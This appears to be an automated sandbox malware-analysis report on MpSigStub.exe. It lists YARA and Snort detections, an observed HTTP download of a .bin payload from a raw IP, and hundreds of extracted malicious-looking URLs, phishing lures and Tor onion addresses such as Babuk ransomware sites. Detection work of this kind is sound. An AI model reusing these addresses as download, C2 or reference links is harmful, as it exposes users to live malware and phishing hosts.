Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B582ADEC FindFirstFileW,FindNextFileW,FindClose,FindClose,	45_2_00007FF7B582ADEC
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B582B030 FindNextFileW,FindClose,FindFirstFileW,	45_2_00007FF7B582B030
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B57DF810 FindFirstFileW,FindNextFileW,FindClose,CloseHandle,CloseHandle,	45_2_00007FF7B57DF810
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B5852504 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	45_2_00007FF7B5852504

Networking:

Yara detected PasteDownloader

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Meterpreter

Show sources

Source: Yara match	File source: 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic

Snort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.11.20:49788 -> 178.32.63.50:80

Uses dynamic DNS services

Show sources

Source: unknown

DNS query: name: septnet.duckdns.org

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	URLs: http://178.32.63.50/mvbs/Host_hKVPgVgQ234.bin
Source: Malware configuration extractor	URLs: http://download.enet.com.cn/search.php?keyword=%s
Source: Malware configuration extractor	URLs: http://www.colegioarbitrosargentinos.com.ar/img/overdue-account/invoice-053541/
Source: Malware configuration extractor	URLs: http://ow.ly/QoHbJ
Source: Malware configuration extractor	URLs: http://santasalete.sp.gov.br/jss/
Source: Malware configuration extractor	URLs: http://www.redirserver.com/update4.cfm?tid=&cn_id=
Source: Malware configuration extractor	URLs: http://194.5.249.107/2nquxqz2ok4a45l.php
Source: Malware configuration extractor	URLs: http://www.youndoo.com/?z=
Source: Malware configuration extractor	URLs: http://%s%simg.jpg
Source: Malware configuration extractor	URLs: http://sonharvaleapena.com.br/en_us/copy_invoice/25680423862/dqzln-cwhrf_yagnf-spn
Source: Malware configuration extractor	URLs: http://vod.7ibt.com/index.php?url=
Source: Malware configuration extractor	URLs: http://microhelptech.com/gotoassist/
Source: Malware configuration extractor	URLs: http://malikberry.com/files101/htamandela.hta
Source: Malware configuration extractor	URLs: http://%domain%/update.php
Source: Malware configuration extractor	URLs: http://d.sogou.com/music.so?query=%s
Source: Malware configuration extractor	URLs: http://%s:%d/%s%d%08d
Source: Malware configuration extractor	URLs: http://%s:%i%s?mod=cmd
Source: Malware configuration extractor	URLs: http://pages
Source: Malware configuration extractor	URLs: http://www.zxboy.com#http://
Source: Malware configuration extractor	URLs: http://p.zhongsou.com/p?w=%s
Source: Malware configuration extractor	URLs: http://88888888.7766.org/ExeIni
Source: Malware configuration extractor	URLs: http://update.7h4uk.com:443/antivirus.php
Source: Malware configuration extractor	URLs: http://23.95.122.25/..-.-................-.....-------------/..............................................................................................dot"targetmode="external"/></relationships>
Source: Malware configuration extractor	URLs: http://flash.chinaren.com/ip/ip.php
Source: Malware configuration extractor	URLs: http://jump.qq.com/clienturl_15
Source: Malware configuration extractor	URLs: http://dialup.carpediem.fr/perl/countdialupinter.pl?
Source: Malware configuration extractor	URLs: http://www.piram.com.br/hosts.txt
Source: Malware configuration extractor	URLs: http://www.now.cn/?SCPMCID=
Source: Malware configuration extractor	URLs: http://110.42.4.180:
Source: Malware configuration extractor	URLs: http://club.book.sina.com.cn/booksearch/booksearch.php?kw=%s
Source: Malware configuration extractor	URLs: http://%76%2E%79%61%6F%36%33%2E%63%6F%6D/url.asp
Source: Malware configuration extractor	URLs: http://ajeyftrjqeashgda.mobi/mSsQDIMIQ/inIDw/
Source: Malware configuration extractor	URLs: http://www.cashon.co.kr/app/app.php?url=
Source: Malware configuration extractor	URLs: http://stats.hosting24.com/count.php
Source: Malware configuration extractor	URLs: http://192.189.25.17/cgbin/ukbros
Source: Malware configuration extractor	URLs: http://pig.zhongsou.com/helpsimple/help.htm
Source: Malware configuration extractor	URLs: http://zsxz.zhongsou.com/route/
Source: Malware configuration extractor	URLs: http://whatami.us.to/tc
Source: Malware configuration extractor	URLs: http://whenyouplaygood.com/s/gate.php?a");f["\x73\x65\x6e\x64"]();eval(f["responsetext"
Source: Malware configuration extractor	URLs: http://23.249.163.163/qwerty.exe
Source: Malware configuration extractor	URLs: http://92.222.7.
Source: Malware configuration extractor	URLs: http://darkside
Source: Malware configuration extractor	URLs: http://so1.5k5.net/interface?action=install&p=
Source: Malware configuration extractor	URLs: http://www.gamedanji.cn/ExeIni
Source: Malware configuration extractor	URLs: http://gosgd.com
Source: Malware configuration extractor	URLs: http://find.verycd.com/folders?cat=movie&kw=%s
Source: Malware configuration extractor	URLs: http://search.dangdang.com/dangdang.dll?mode=1020&catalog=100&key1=%s
Source: Malware configuration extractor	URLs: http://216.172.172.40/~agora546/cardoso/dilma.zip
Source: Malware configuration extractor	URLs: http://www.cashon.co.kr/app/uninstall.php?
Source: Malware configuration extractor	URLs: http://www.moliv.com.br/stat/email0702/
Source: Malware configuration extractor	URLs: http://foo.w97.cn/data/file/kwbuf.ini
Source: Malware configuration extractor	URLs: http://chemgioaz.blogspot.com/
Source: Malware configuration extractor	URLs: http://init.icloud-analysis.com
Source: Malware configuration extractor	URLs: http://img.zhongsou.com/i?w=%s
Source: Malware configuration extractor	URLs: http://new.beahh.com/startup.php
Source: Malware configuration extractor	URLs: http://pznjaslo.pl/wp-content/outstanding-invoices/
Source: Malware configuration extractor	URLs: http://instamailserver.link/finito.ps1
Source: Malware configuration extractor	URLs: http://www.enquesta.tempsdoci.com/tracking-number-7fjs84476372436909/mar-13-18-04-02-56
Source: Malware configuration extractor	URLs: http://mp3.baidu.com/m?tn=baidump3lyric&ct=
Source: Malware configuration extractor	URLs: http://3dplayful.blogspot.com/
Source: Malware configuration extractor	URLs: http://stroyprivoz.ru/dokumente-vom-notar/
Source: Malware configuration extractor	URLs: http://a.pomf.cat/
Source: Malware configuration extractor	URLs: http://hotedeals.co.uk/ekck095032/
Source: Malware configuration extractor	URLs: http://www.iask.com/s?k=%s
Source: Malware configuration extractor	URLs: http://vidquick.info/cgi/
Source: Malware configuration extractor	URLs: http://gg
Source: Malware configuration extractor	URLs: http://speedmasterprinters.co.za/erroreng/erroreng/erroreng/erroreng/ii.php
Source: Malware configuration extractor	URLs: http://search.newhua.com/search.asp?Keyword=%s
Source: Malware configuration extractor	URLs: http://(www\|corail)\\.sudoc
Source: Malware configuration extractor	URLs: http://stat.wamme.cn/C8C/gl/cnzz60.html
Source: Malware configuration extractor	URLs: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline
Source: Malware configuration extractor	URLs: http://mp3.zhongsou.com/m?w=%s
Source: Malware configuration extractor	URLs: http://yc.book.sohu.com/series_list.php?select=1&text=%s
Source: Malware configuration extractor	URLs: http://kremlin-malwrhunterteam.info/scan.exe
Source: Malware configuration extractor	URLs: http://8nasrcity.blogspot.com/
Source: Malware configuration extractor	URLs: http://www.preyer.it/ups.com/
Source: Malware configuration extractor	URLs: http://bittupadam.blogspot.com/
Source: Malware configuration extractor	URLs: http://search.btchina.net/search.php?query=%s
Source: Malware configuration extractor	URLs: http://www.bluelook.es/bvvtbbh.php
Source: Malware configuration extractor	URLs: http://articlunik.blogspot.com/
Source: Malware configuration extractor	URLs: http://localhost:62338/Chipsetsync.asmx
Source: Malware configuration extractor	URLs: http://www.microsoft.com0
Source: Malware configuration extractor	URLs: http://%20%20@j.mp/as
Source: Malware configuration extractor	URLs: http://ys.cn.yahoo.com/mohu/index.html?p=%s
Source: Malware configuration extractor	URLs: http://coltaddict.blogspot.com/
Source: Malware configuration extractor	URLs: http://jump.qq.com/clienturl_100?clientuin=
Source: Malware configuration extractor	URLs: http://www.ip.com.cn/idcard.php?q=%s
Source: Malware configuration extractor	URLs: http://www.thon-samson.be/js/_notes/
Source: Malware configuration extractor	URLs: http://rl.ammyy.com
Source: Malware configuration extractor	URLs: http://fixdoctorsfirst.net/registry/andyfkz.png?bg=sp14
Source: Malware configuration extractor	URLs: http://animefrase.blogspot.com/
Source: Malware configuration extractor	URLs: http://binyousafindustries.com/fonts/jo/mops.exe
Source: Malware configuration extractor	URLs: http://images.google.cn/images?q=%s
Source: Malware configuration extractor	URLs: http://aindonashi.blogspot.com/
Source: Malware configuration extractor	URLs: http://alindaenua.blogspot.com/
Source: Malware configuration extractor	URLs: http://v.iask.com/v?tag=&k=%s
Source: Malware configuration extractor	URLs: http://www.w3.org/1999/xsl/transform
Source: Malware configuration extractor	URLs: http://95.173.183.
Source: Malware configuration extractor	URLs: http://www.contacto1190.com.mx/css/aa/index.php?userid=admin.sharepoint@truvo.be
Source: Malware configuration extractor	URLs: http://www.cashon.co.kr/search/search.php
Source: Malware configuration extractor	URLs: http://page.zhongsou.com/ps?tps=2&cc=%s&aid=CA%s&w=
Source: Malware configuration extractor	URLs: http://pssquared.com/invoice-status/tracking-number-and-invoice-of-your-order/
Source: Malware configuration extractor	URLs: http://vequiato.sites.uol.com.br/
Source: Malware configuration extractor	URLs: http://</t></si><si><t>188.127.231.
Source: Malware configuration extractor	URLs: http://127.0.0.1:20202/remind.html
Source: Malware configuration extractor	URLs: http://92.38.135.46/43cfqysryip51zzq.php
Source: Malware configuration extractor	URLs: http://%s%s
Source: Malware configuration extractor	URLs: http://208.95.104.
Source: Malware configuration extractor	URLs: http://abeidaman.blogspot.com/
Source: Malware configuration extractor	URLs: http://flow4.6299.cc/ClientAPI/flowtaskAPI.aspx
Source: Malware configuration extractor	URLs: http://20vp.cn/moyu/
Source: Malware configuration extractor	URLs: http://www.look2me.com
Source: Malware configuration extractor	URLs: http://www.wosss.com/search.aspx?q=%s
Source: Malware configuration extractor	URLs: http://www.3322.org/dyndns/getip
Source: Malware configuration extractor	URLs: http://www.ip.com.cn/ip.php?q=%s
Source: Malware configuration extractor	URLs: http://81.177.26.20/ayayay
Source: Malware configuration extractor	URLs: http://cvfanatic.blogspot.com/
Source: Malware configuration extractor	URLs: http://best4hack.blogspot.com/
Source: Malware configuration extractor	URLs: http://cicahroti.blogspot.com/
Source: Malware configuration extractor	URLs: http://www.j.mp/
Source: Malware configuration extractor	URLs: http://anomaniez.blogspot.com/
Source: Malware configuration extractor	URLs: http://62.210.214.
Source: Malware configuration extractor	URLs: http://bonkersmen.blogspot.com/
Source: Malware configuration extractor	URLs: http://zilmaraalencar.com.br/layouts/plugins/editors/tinymce/field/zzurphy.php
Source: Malware configuration extractor	URLs: http://search.17173.com/index.jsp?keyword=%s
Source: Malware configuration extractor	URLs: http://www.22teens.com/
Source: Malware configuration extractor	URLs: http://beautifulmaori.co.nz/wp-content/plugins/wp-xmll_2/gorfy2pq/1ny0mnkih27id8m.ktk
Source: Malware configuration extractor	URLs: http://%s:%i%s
Source: Malware configuration extractor	URLs: http://vidscentral.net/inc/6348852
Source: Malware configuration extractor	URLs: http://download.zhongsou.com/cdsearch/
Source: Malware configuration extractor	URLs: http://babukq4e2p4wu4iq.onion
Source: Malware configuration extractor	URLs: http://aspx.vod38.com/
Source: Malware configuration extractor	URLs: http://200.159.128.
Source: Malware configuration extractor	URLs: http://v.baidu.com/srh.php?tn=oliver1_dg&word=%s
Source: Malware configuration extractor	URLs: http://www.soso.com/q?w=%s
Source: Malware configuration extractor	URLs: http://kavok.ind.br/ds/2312.gif
Source: Malware configuration extractor	URLs: http://www.tempuri.org/DataSet1.xsd
Source: Malware configuration extractor	URLs: http://batrasiaku.blogspot.com/
Source: Malware configuration extractor	URLs: http://bardubar.com/mMS83JIdhq/ieygBSH38hsJa/
Source: Malware configuration extractor	URLs: http://bigboobsp.blogspot.com/
Source: Malware configuration extractor	URLs: http://www.phokhobazan.com/%202%200%201%208-0%207%20-%201%201%202%200%200%207:%202%206:%2099%20819.php/?email=kevind@hollywoodwoodwork.com"target="_blank
Source: Malware configuration extractor	URLs: http://reports.montiera.com/reports/jsRprt.srf?rid=nsis&nsisState=
Source: Malware configuration extractor	URLs: http://www.look2me.com/products/
Source: Malware configuration extractor	URLs: http://www.chipsroofingloveland.com/status/services-06-26-18-new-customer-vh/
Source: Malware configuration extractor	URLs: http://ks.pconline.com.cn/index.jsp?qx=download&q=%s
Source: Malware configuration extractor	URLs: http://blog.x-row.net/
Source: Malware configuration extractor	URLs: http://ads.8866.org/
Source: Malware configuration extractor	URLs: http://spotdewasa.blogspot.com/
Source: Malware configuration extractor	URLs: http://www.zhongsou.com/kefu/zskf.htm
Source: Malware configuration extractor	URLs: http://bit.ly
Source: Malware configuration extractor	URLs: http://adsl.carpediem.fr/perl/invoc_oneway.pl?
Source: Malware configuration extractor	URLs: http://xn---82-qdd0akcfirgv4j.xn--p1ai/ups-ship-notification/mar-13-18-07-06-38/
Source: Malware configuration extractor	URLs: http://31.192.210.
Source: Malware configuration extractor	URLs: http://www.daybt.com/query.asp?q=%s
Source: Malware configuration extractor	URLs: http://3117488091/lib/jquery-3.2.1.min.js
Source: Malware configuration extractor	URLs: http://funsiteshere.com/redir.php
Source: Malware configuration extractor	URLs: http://pic.sogou.com/pics?query=%s
Source: Malware configuration extractor	URLs: http://softthrifty.com/security.jsp
Source: Malware configuration extractor	URLs: http://www.tq121.com.cn/
Source: Malware configuration extractor	URLs: http://dialup.carpediem.fr/perl/dialup.pl
Source: Malware configuration extractor	URLs: http://z1.nf-2.net/512.txt
Source: Malware configuration extractor	URLs: http://alhalm-now.blogspot.com/
Source: Malware configuration extractor	URLs: http://31.192.209.
Source: Malware configuration extractor	URLs: http://94.102.14.
Source: Malware configuration extractor	URLs: http://aolopdephn.blogspot.com/
Source: Malware configuration extractor	URLs: http://50.63.128.
Source: Malware configuration extractor	URLs: http://dontkillme/
Source: Malware configuration extractor	URLs: http://agressor58.blogspot.com/
Source: Malware configuration extractor	URLs: http://3s249.s249327.96.lt/mss2ro37qtl3cbw9vo0lk2bx8vv7jmx2mlesim9ddw11fem3sjp3ijuoufk/mss.php
Source: Malware configuration extractor	URLs: http://gosgd2.com
Source: Malware configuration extractor	URLs: http://musah.info/
Source: Malware configuration extractor	URLs: http://berkah2013.blogspot.com/
Source: Malware configuration extractor	URLs: http://wevx.xyz/post.php?uid=
Source: Malware configuration extractor	URLs: http://search.union.yahoo.com.cn/click/search.htm?m=
Source: Malware configuration extractor	URLs: http://search.games.sina.com.cn/cgi-bin/game_search/game_deal.cgi?keywords=%s
Source: Malware configuration extractor	URLs: http://www.sagawa-exp.co.jp/
Source: Malware configuration extractor	URLs: http://www.look2me.com/cgi
Source: Malware configuration extractor	URLs: http://lo0oading.blogspot.com/
Source: Malware configuration extractor	URLs: http://iranvision1404.com/ss/info/redebit_transactions/terms/kohc-xuxo_lcxty-av6e
Source: Malware configuration extractor	URLs: http://61.19.253.
Source: Malware configuration extractor	URLs: http://www.klikspaandelft.nl/
Source: Malware configuration extractor	URLs: http://xn--
Source: Malware configuration extractor	URLs: http://www.trotux.com/?z=
Source: Malware configuration extractor	URLs: http://arifkacip.blogspot.com/
Source: Malware configuration extractor	URLs: http://clients.lb1networks.com/upd.php?
Source: Malware configuration extractor	URLs: http://html.hjsm.tom.com/?mod=book&act=anonsearch&key=%s
Source: Malware configuration extractor	URLs: http://go.58.com/?f=
Source: Malware configuration extractor	URLs: http://aspx.qqus.net/wanmei/login.asp
Source: Malware configuration extractor	URLs: http://afkar.today/test_coming.training/w_f/
Source: Malware configuration extractor	URLs: http://www.3000.ws/
Source: Malware configuration extractor	URLs: http://js.pkglayer.com
Source: Malware configuration extractor	URLs: http://p.iask.com/p?k=%s
Source: Malware configuration extractor	URLs: http://hostthenpost.org/uploads/
Source: Malware configuration extractor	URLs: http://www.iciba.com/search?s=%s
Source: Malware configuration extractor	URLs: http://%domain%/config.php
Source: Malware configuration extractor	URLs: http://zsnews.zhongsou.com/zsnews.cgi?tps=3&agent=%s&word=
Source: Malware configuration extractor	URLs: http://rapidshare.com/files/
Source: Malware configuration extractor	URLs: http://www.mypaymate.com/dialerplatform/tmp.htm
Source: Malware configuration extractor	URLs: http://www.baidu.com/baidu?tn=
Source: Malware configuration extractor	URLs: http://%s/%s/?m=e&p1=%s&p2=%s&p3=%s
Source: Malware configuration extractor	URLs: http://www.sogou.com/web?query=%s
Source: Malware configuration extractor	URLs: http://www.sacbarao.kinghost.net/
Source: Malware configuration extractor	URLs: http://www.2345.com
Source: Malware configuration extractor	URLs: http://203.199.200.61
Source: Malware configuration extractor	URLs: http://music.cn.yahoo.com/lyric.html?p=%s
Source: Malware configuration extractor	URLs: http://ahmad-roni.blogspot.com/
Source: Malware configuration extractor	URLs: http://www.inet4you.com/exit/
Source: Malware configuration extractor	URLs: http://185.153.198.216:8010/UserService
Source: Malware configuration extractor	URLs: http://search.crsky.com/search.asp?sType=ResName&keyword=%s
Source: Malware configuration extractor	URLs: http://www.google.cn/search?q=%s
Source: Malware configuration extractor	URLs: http://games.enet.com.cn/article/SearchCategory.php?key=%s
Source: Malware configuration extractor	URLs: http://citw-vol2.blogspot.com/
Source: Malware configuration extractor	URLs: http://ks.pcgames.com.cn/games_index.jsp?q=%s
Source: Malware configuration extractor	URLs: http://music.soso.com/q?sc=mus&w=%s
Source: Malware configuration extractor	URLs: http://ksn.a
Source: Malware configuration extractor	URLs: http://webpatch.ragnarok.co.kr/
Source: Malware configuration extractor	URLs: http://2010-kpss.blogspot.com/
Source: Malware configuration extractor	URLs: http://image.soso.com/image.cgi?w=%s
Source: Malware configuration extractor	URLs: http://cbl.toolbar4free.com/cgi-bin/s.exe
Source: Malware configuration extractor	URLs: http://aitimatafb.blogspot.com/
Source: Malware configuration extractor	URLs: http://61.160.222.11:
Source: Malware configuration extractor	URLs: http://mp3.baidu.com/m?tn=
Source: Malware configuration extractor	URLs: http://%s/ftp/g.php
Source: Malware configuration extractor	URLs: http://weather.265.com/%s
Source: Malware configuration extractor	URLs: http://toolbar.deepdo.com/download/
Source: Malware configuration extractor	URLs: http://888888.2288.org/Monitor_INI
Source: Malware configuration extractor	URLs: http://%s/any2/%s-direct.ex
Source: Malware configuration extractor	URLs: http://www.ip.com.cn/mobile.php?q=%s
Source: Malware configuration extractor	URLs: http://www.88vcd.com/htm/china/myb/send.asp?daqu=%s&xiaoqu=%s&user=%s&pass=%s&ckpass=%s&renwu=%s&level=%d&gold=%d&stone=%d&cpname
Source: Malware configuration extractor	URLs: http://session-dyfm.clientmsg13.review/8446c35a41f9e820533b6cd008b40749?fpcum=&dyfm=ywx2yxjvx3zlbgfzy29adndylmnvbq==&dyfm=cpjyicit
Source: Malware configuration extractor	URLs: http://likesomessfortelr.eu/mSsNX3JDSJD/inNSj398LSj/
Source: Malware configuration extractor	URLs: http://www.qq994455.com/
Source: Malware configuration extractor	URLs: http://%s
Source: Malware configuration extractor	URLs: http://www.ip.com.cn/tel.php?q=%s
Source: Malware configuration extractor	URLs: http://community.derbiz.com/
Source: Malware configuration extractor	URLs: http://31.192.211.
Source: Malware configuration extractor	URLs: http://"+hashdate().tostring(16)+".eu/script.html
Source: Malware configuration extractor	URLs: http://devee.emlnk.com/lt.php?s=b7abe8a8120881cc5c9dab6eac28ddbe&i=1a3a1a
Source: Malware configuration extractor	URLs: http://errors.statsmyapp.com/installer-error.gif?action=wrapper
Source: Malware configuration extractor	URLs: http://www.lumina.it/wp-content/plugins/all-in-one-wp-migration/storage/client/invoice-978561/
Source: Malware configuration extractor	URLs: http://fateh.aba.ae/xyzx.zip
Source: Malware configuration extractor	URLs: http://www.ip138.com
Source: Malware configuration extractor	URLs: http://gaigoixxx.blogspot.com/
Source: Malware configuration extractor	URLs: http://batysnewskz.kz/ups.com
Source: Malware configuration extractor	URLs: http://104.236.94.
Source: Malware configuration extractor	URLs: http://70.38.40.185
Source: Malware configuration extractor	URLs: http://1bestgate.blogspot.com/
Source: Malware configuration extractor	URLs: http://0.82211.net/
Source: Malware configuration extractor	URLs: http://dl.dropbox.com/u/
Source: Malware configuration extractor	URLs: http://basti.ciseducation.org/website/images/prettyphoto/dark_square/.x1-unix/
Source: Malware configuration extractor	URLs: http://www.ssl-256mail.host/5c596a68b83a886b57ade24c?jgiasyi=&pwnmiz_g=1eo3fjfkkke&jgiasyi=wtnygzsiyw
Source: Malware configuration extractor	URLs: http://acayipbiri.blogspot.com/
Source: Malware configuration extractor	URLs: http://qwuyegasd3edarq6yu.org/mSsQDIMIQ/ind7694GDs/
Source: Malware configuration extractor	URLs: http://fateh.aba.ae/abc.zip
Source: Malware configuration extractor	URLs: http://www.agendagyn.com/media/fotos/2010/
Source: Malware configuration extractor	URLs: http://avnisevinc.blogspot.com/
Source: Malware configuration extractor	URLs: http://www.linkinc.es/scss/water.php
Source: Malware configuration extractor	URLs: http://ip-api.com/
Source: Malware configuration extractor	URLs: http://autothich.blogspot.com/
Source: Malware configuration extractor	URLs: http://www.cashon.co.kr/app/install.php?
Source: Malware configuration extractor	URLs: http://178.79.137.25/campo/
Source: Malware configuration extractor	URLs: http://srmvx.com.br/uploads/
Source: Malware configuration extractor	URLs: http://cert.beahh.com/cert.php
Source: Malware configuration extractor	URLs: http://calleveinte.com.mx/ups-quantum-view
Source: Malware configuration extractor	URLs: http://cs.zhongsou.com/
Source: Malware configuration extractor	URLs: http://foo.w97.cn/SoftInterFace/SearchNum.aspx
Source: Malware configuration extractor	URLs: http://weather.265.com/get_weather.php?action=get_city
Source: Malware configuration extractor	URLs: http://tempuri.org/
Source: Malware configuration extractor	URLs: http://tool.world2.cn/toolbar/
Source: Malware configuration extractor	URLs: http://mitotl.com.mx/ups.com/
Source: Malware configuration extractor	URLs: http://www.yodao.com/search?ue=utf8&q=%s
Source: Malware configuration extractor	URLs: http://%20%20@j.mp/axas
Source: Malware configuration extractor	URLs: http://aancyber77.blogspot.com/
Source: Malware configuration extractor	URLs: http://www.whitehouseknutsford.co.uk/invoice-status/please-pull-invoice-684594/
Source: Malware configuration extractor	URLs: http://www.
Source: Malware configuration extractor	URLs: http://smart.linkprice.com/sem/overture_sponsor_search.php?maxcnt=&js=2&type=
Source: Malware configuration extractor	URLs: http://arthisoft.blogspot.com/
Source: Malware configuration extractor	URLs: http://sf3q2wrq34.ddns.net

Found Tor onion address

Show sources

Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: torlink='http://oc6mkf4efqrjp2ue6qp6vmz4ofyjmlo6dtqiklqb2q546bnqeu66tbyd.onion'
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: Qtorlink='http://oc6mkf4efqrjp2ue6qp6vmz4ofyjmlo6dtqiklqb2q546bnqeu66tbyd.onion'
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: Open link in tor browser: http://gdcbmuveqjsli57x.onion/b93cf40ee63ed066
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://babukq4e2p4wu4iq.onion
Source: MpSigStub.exe, 00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp	String found in binary or memory: https://djdkduep62kz4nzx.onion.to/
Source: MpSigStub.exe, 00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp	String found in binary or memory: $https://djdkduep62kz4nzx.onion.to/

Source: Joe Sandbox View

IP Address: 178.32.63.50 178.32.63.50

Source: global traffic

TCP traffic: 192.168.11.20:49790 -> 193.104.197.90:6577

Source: global traffic

HTTP traffic detected: GET /mvbs/Host_hKVPgVgQ234.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 178.32.63.50Cache-Control: no-cache

Source: Joe Sandbox View	ASN Name: TELIANETTeliaCarrierEU TELIANETTeliaCarrierEU
Source: Joe Sandbox View	ASN Name: OVHFR OVHFR

Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: HTTP://www.EEEEEEE.EEE
Source: MpSigStub.exe, 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp	String found in binary or memory: http://%61%63%67%6c%67%6f%61%2e%63%6f%6d/h.js
Source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	String found in binary or memory: http://%63%61%39%78%2e%63%6f%6d/ken.gif
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://%76%2E%79%61%6F%36%33%2E%63%6F%6D/url.asp
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://%76%2E%79%61%6F%36%33%2E%63%6F%6D/url.asp%C5%E4%D6%C3%D0%C5%CF%A2
Source: MpSigStub.exe, 00000026.00000003.18352509630.00000138BD16D000.00000004.00000001.sdmp	String found in binary or memory: http://%HOST%/client/install.htm?cid=%CID%
Source: MpSigStub.exe, 00000026.00000003.18352509630.00000138BD16D000.00000004.00000001.sdmp	String found in binary or memory: http://%HOST%/client/open.htm?GUID=%GUID%&cid=%CID%
Source: MpSigStub.exe, 00000026.00000003.18352509630.00000138BD16D000.00000004.00000001.sdmp	String found in binary or memory: http://%HOST%/client/run.htm?GUID=%GUID%&cid=%CID%
Source: MpSigStub.exe, 00000026.00000003.18352509630.00000138BD16D000.00000004.00000001.sdmp	String found in binary or memory: http://%HOST%/client/scan.htm?GUID=%GUID%&cid=%CID%x
Source: MpSigStub.exe, 00000026.00000003.18352509630.00000138BD16D000.00000004.00000001.sdmp	String found in binary or memory: http://%HOST%/client/uninstall.htm?GUID=%GUID%&cid=%CID%
Source: MpSigStub.exe, 00000026.00000003.18352509630.00000138BD16D000.00000004.00000001.sdmp	String found in binary or memory: http://%HOST%/client/update.htm?GUID=%GUID%&cid=%CID%
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://%d.%d.%d.%d:%d/
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://%d.%d.%d.%d:%d/%d/%d/%d/%d/%d/%d/
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: http://%d.%d.%d.%d:3128/
Source: MpSigStub.exe, 00000026.00000003.18339794865.00000138BD272000.00000004.00000001.sdmp	String found in binary or memory: http://%d.ctrl.%s
Source: MpSigStub.exe, 00000026.00000003.18339794865.00000138BD272000.00000004.00000001.sdmp	String found in binary or memory: http://%d.ctrl.%saf
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://%domain%/config.php
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://%domain%/content.php?se_id=%d&q=%s&page=%s&ua=%s&al=%s&aff_id=%s&sub_id=%s
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://%domain%/update.php
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://%domain%/update.phpa
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://%s%simg.jpg
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://%s.com/registerguid.php?guid=
Source: MpSigStub.exe, 00000026.00000003.18344712542.00000138BD9CA000.00000004.00000001.sdmp	String found in binary or memory: http://%s/?aid=%shttp://%s/sync.php
Source: MpSigStub.exe, 00000026.00000003.18331763483.00000138BE49F000.00000004.00000001.sdmp	String found in binary or memory: http://%s/any2/%s-direct.ex
Source: MpSigStub.exe, 00000026.00000003.18331763483.00000138BE49F000.00000004.00000001.sdmp	String found in binary or memory: http://%s/any2/%s-direct.exx
Source: MpSigStub.exe, 00000026.00000003.18313135929.00000138BE99B000.00000004.00000001.sdmp	String found in binary or memory: http://%s/asghfd.php?&&u=%u&p=%u&lang
Source: MpSigStub.exe, 00000026.00000003.18313135929.00000138BE99B000.00000004.00000001.sdmp	String found in binary or memory: http://%s/asghfd.php?&&u=%u&p=%u&langad
Source: MpSigStub.exe, 00000026.00000003.18332044939.00000138BE4E0000.00000004.00000001.sdmp	String found in binary or memory: http://%s/block.phpa
Source: MpSigStub.exe, 00000026.00000003.18313135929.00000138BE99B000.00000004.00000001.sdmp	String found in binary or memory: http://%s/buy_online.php
Source: MpSigStub.exe, 00000026.00000003.18313135929.00000138BE99B000.00000004.00000001.sdmp	String found in binary or memory: http://%s/buy_online.phpa
